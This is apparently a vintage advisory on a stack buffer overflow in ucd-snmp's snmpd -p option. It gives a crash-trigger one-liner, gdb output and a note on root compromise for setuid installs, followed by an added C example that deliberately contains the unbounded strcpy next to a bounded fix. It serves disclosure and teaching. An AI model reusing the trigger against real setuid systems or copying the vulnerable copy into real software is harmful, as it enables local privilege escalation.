---------- priestmaster's UCD-SNMP local buffer overflow advisory -------------

Affected file: /usr/local/bin/snmpd
Version      : ucd-snmp <= 4.2.6
Error class  : command line buffer overflow

It is possible to overflow a stack buffer by starting snmpd with a long
string as the argument to the -p switch:

    ./snmpd -p `perl -e 'print "A"x6700'`
    Segmentation fault

In gdb:

    (gdb) r -p `perl -e 'print "A"x6700'`
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /usr/local/sbin/./snmpd -p `perl -e 'print "A"x6700'`

    Program received signal SIGSEGV, Segmentation fault.
    0x804a2d6 in main (argc=1094795585, argv=0x41414141) at snmpd.c:453
    453       if (argv[arg][0] == '-') {

argc (1094795585 == 0x41414141) and argv are both filled with our 'A's: the
copy has run out of the local buffer in main's frame and, on x86 with the
usual frame layout, over the saved frame pointer and return address into
main's own arguments. The crash is simply the next dereference of the
clobbered argv. buf is the overflowed buffer:

    (gdb) x/50x buf
    0xbfffc4bc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc4cc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc4dc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc4ec: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc4fc: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc50c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc51c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc52c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc53c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc54c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc55c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc56c: 0x41414141 0x41414141 0x41414141 0x41414141
    0xbfffc57c: 0x41414141 0x41414141

If snmpd is installed setuid root, the return address can be overwritten
to jump to attacker-supplied shellcode and spawn a root shell (local root
compromise). Note that a default build does not install snmpd setuid; the
bug only becomes a privilege escalation where an administrator has made the
binary setuid root, or where a privileged wrapper launches it with
user-controlled arguments. Where snmpd is only ever started by root from
an init script, the impact is limited to a crash of the daemon at startup.

If you have questions, mail me or visit my homepage.

http://www.priestmaster.org

Happy hacking,
priestmaster
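The following is an added example, not code from the advisory or from ucd-snmp: a hypothetical reconstruction of the bug class described above (the value after -p copied with strcpy() into a fixed-size stack array) next to a bounded parser that rejects the same 6700-byte argument. The buffer size PORT_BUF, the function names and the return codes are assumptions; the real snmpd.c differs.

```c
/*
 * Hypothetical reconstruction of the advisory's bug class, not ucd-snmp's
 * snmpd.c: a fixed-size stack buffer filled from the -p argument without a
 * length check, beside a bounded version. Buffer size, names and return
 * codes are assumptions for illustration.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PORT_BUF 32            /* assumed size; the real snmpd buffer differs */

/* Vulnerable pattern: strcpy() of argv[] data into a local array.
 * An argument longer than PORT_BUF-1 bytes runs past the array over the
 * saved frame pointer and return address (and, as the gdb session in the
 * advisory shows, into main's argc/argv). Only call this with short input;
 * a long argument corrupts the stack exactly as described above. */
int parse_port_unsafe(int argc, char **argv)
{
    char buf[PORT_BUF];
    for (int arg = 1; arg < argc; arg++) {
        if (strcmp(argv[arg], "-p") == 0) {
            if (arg + 1 >= argc)
                return -1;                  /* -p with no value */
            strcpy(buf, argv[arg + 1]);     /* unbounded copy: the overflow */
            return atoi(buf);
        }
    }
    return -1;                              /* no -p given */
}

/* Bounded version: refuse any value that would not fit, then validate it
 * as a port number. Returns 0 and sets *port on success, negative on error. */
int parse_port_safe(int argc, char **argv, int *port)
{
    char buf[PORT_BUF];
    for (int arg = 1; arg < argc; arg++) {
        if (strcmp(argv[arg], "-p") == 0) {
            if (arg + 1 >= argc)
                return -1;                  /* -p with no value */
            const char *val = argv[arg + 1];
            size_t n = strlen(val);
            if (n >= sizeof buf)
                return -2;                  /* would overflow: reject it */
            memcpy(buf, val, n + 1);        /* bounded copy including NUL */
            char *end = NULL;
            long p = strtol(buf, &end, 10);
            if (end == buf || *end != '\0' || p < 1 || p > 65535)
                return -3;                  /* not a valid port number */
            *port = (int)p;
            return 0;
        }
    }
    return -4;                              /* no -p given */
}

/* Builds the advisory's trigger, perl -e 'print "A"x6700', as a C string.
 * The caller frees the result. */
char *make_overflow_arg(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(void)
{
    char *big = make_overflow_arg(6700);
    char *argv_attack[] = { "snmpd", "-p", big, NULL };   /* constructed input */
    char *argv_normal[] = { "snmpd", "-p", "161", NULL }; /* constructed input */
    int port = 0;

    printf("normal arg, unsafe parser: %d\n", parse_port_unsafe(3, argv_normal));
    printf("normal arg, safe parser: rc=%d port=%d\n",
           parse_port_safe(3, argv_normal, &port), port);
    /* parse_port_unsafe(3, argv_attack) would smash the stack; the bounded
     * parser rejects the same 6700-byte value instead of copying it. */
    printf("6700 x 'A', safe parser: rc=%d\n",
           parse_port_safe(3, argv_attack, &port));
    free(big);
    return 0;
}
```

Compile with something like `gcc -O0 -fno-stack-protector -o parse parse.c` if you want to watch the unsafe parser fault the way the advisory's snmpd does; a modern toolchain's stack protector will otherwise abort the process before the corrupted return address is used.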